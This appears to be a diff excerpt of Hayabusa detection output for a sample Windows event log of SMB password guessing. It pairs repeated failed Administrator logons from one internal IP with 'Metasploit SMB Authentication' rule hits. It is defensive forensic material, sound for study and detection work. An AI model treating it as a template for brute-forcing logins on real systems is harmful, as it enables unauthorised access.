+2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3YusfxQQygi2x5Cu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6q29uj6ovfwz0riC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cj38VsqGLoQ8jGdf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TOW8OIO2vQRFaTID  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DfYITdZCYwEj9IJV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4BI6V35tZGZ1WGtJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wOF75n4aunKH9qxc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jsTFTCnFFBkhG5jP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5qiwcKE2TQui2H8z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PZOCyXplWOCyKbFm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RhyaAhYB78nbh1Ig  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MIJU9xbr1klIvvdE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qLKVR3mW3g3utO4X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aNm4tVG8bV7e9gbB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JtU0PCr9K5DXFYV2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CH3BWNPEWlw52Gb6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vQTYqFKBz6YEWhF6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qkj3u8ODgLD7xQ5R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r9uyze1uO0zuNNUM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UmL15i3edXHcUamI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x7xjFRjv9rDhiXJ6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6BmQhVEv8g7EKu1F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: upOMmG87cDO1NFg0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tO55KfkORhxFORvF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: D64wDbqkqmzWuUSa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sIDgNIlGA0cOkBOI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i0kXPQ6s7CGe4QGA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HW5jP389jmqSkzF1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: enhsof25BdDPcI2c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4acsPMLUJRrT7mmL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hi1dzny6hpyr5N3d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RlPVBSnDMlE0QZaJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: th72TwMoRXtDVWge  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KGTTiJSkErjzoUUC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xyzZwNLltF0cYnai  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gYWVQ6mCqyBfDm3m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rg2x2lv9JeS5Bb6l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fU28NKC3WYxFGbMN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EUWDXgnogGDXizWj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IXhAtnNcQKOIsuGS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cKfrJwI3OGdjL4af  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VdekC160hU7YzrK9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: enOBuzd6jwu8rZCH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eAjLjDlZSps5D49t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rY6CONLBVygSTnY5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6FIHgz2yqqbD9zfV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
